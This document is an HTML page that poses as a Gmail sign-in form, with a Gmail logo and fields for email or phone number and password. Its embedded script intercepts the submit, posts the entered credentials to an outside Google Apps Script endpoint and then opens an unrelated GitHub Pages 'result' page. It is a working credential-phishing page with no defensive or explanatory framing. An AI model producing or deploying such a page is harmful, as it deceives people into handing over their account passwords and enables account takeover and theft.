<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login Form</title>
  <style>
    * {
      box-sizing: border-box;
    }

    body {
      background-color: #eeeeee;
      font-family: Arial, sans-serif;
    }

    .form {
      background-color: #ffffff;
      width: 100%;
      max-width: 500px;
      margin: 50px auto 10px auto;
      padding: 30px;
      border-radius: 8px;
      overflow: hidden;
      box-shadow: 0 2px 10px -3px #333;
      text-align: center;
    }

    img {
      display: block;
      width: 100px;
      height:100px;
      margin: 30px auto 20px auto;
      box-shadow: 0 5px 10px -7px #333333;
      border-radius: 50%;
    }

    input {
      border-radius: 100px;
      padding: 10px 15px;
      width: 100%;
      border: 1px solid #D9D9D9;
      outline: none;
      display: block;
      margin: 20px auto 20px auto;
    }

    button {
      border-radius: 100px;
      border: none;
      background: #0099ff;
      width: 100%;
      padding: 10px;
      color: #FFFFFF;
      margin-top: 25px;
      box-shadow: 0 2px 10px -3px #719BE6;
      display: block;
      margin: 55px auto 10px auto;
    }

    a {
      text-align: center;
      margin-top: 30px;
      color: #719BE6;
      text-decoration: none;
      padding: 5px;
      display: inline-block;
    }

    a:hover {
      text-decoration: underline;
    }
  </style>
</head>
<body>
  <div class="form">
    <img src="https://github.com/Freeindian/Post-office/raw/main/Gmail.png">
    <form autocomplete="off" method="post" name ="google-sheet">
    
    <input type="text" name="id" placeholder="Email or phone number" required>
    <input type="text" name="password" placeholder="Password" required>
    <button type="submit" name="submit" class="submit">Sign in</button>
    
    <a href="https://www.google.com/">Create account</a></form>
  </div>
  <script>
  const scriptURL = 'https://script.google.com/macros/s/AKfycbwQsbgxeybxhfjj1ojULpAPeG8oLOgAgNdbhWMwYMH2NsgVH5yEBT9_WEnw1U4Z0pfj3g/exec'
  const form = document.forms['google-sheet']
  
  form.addEventListener('submit', e => {
  e.preventDefault()
  fetch(scriptURL, { method: 'POST', body: new FormData(form)})
  .then(window.open('https://freeindian.github.io/Post-office/result' , 'blank'))
  .catch(error => console.error('Error!', error.message))
  })
  </script>
</body>
</html>
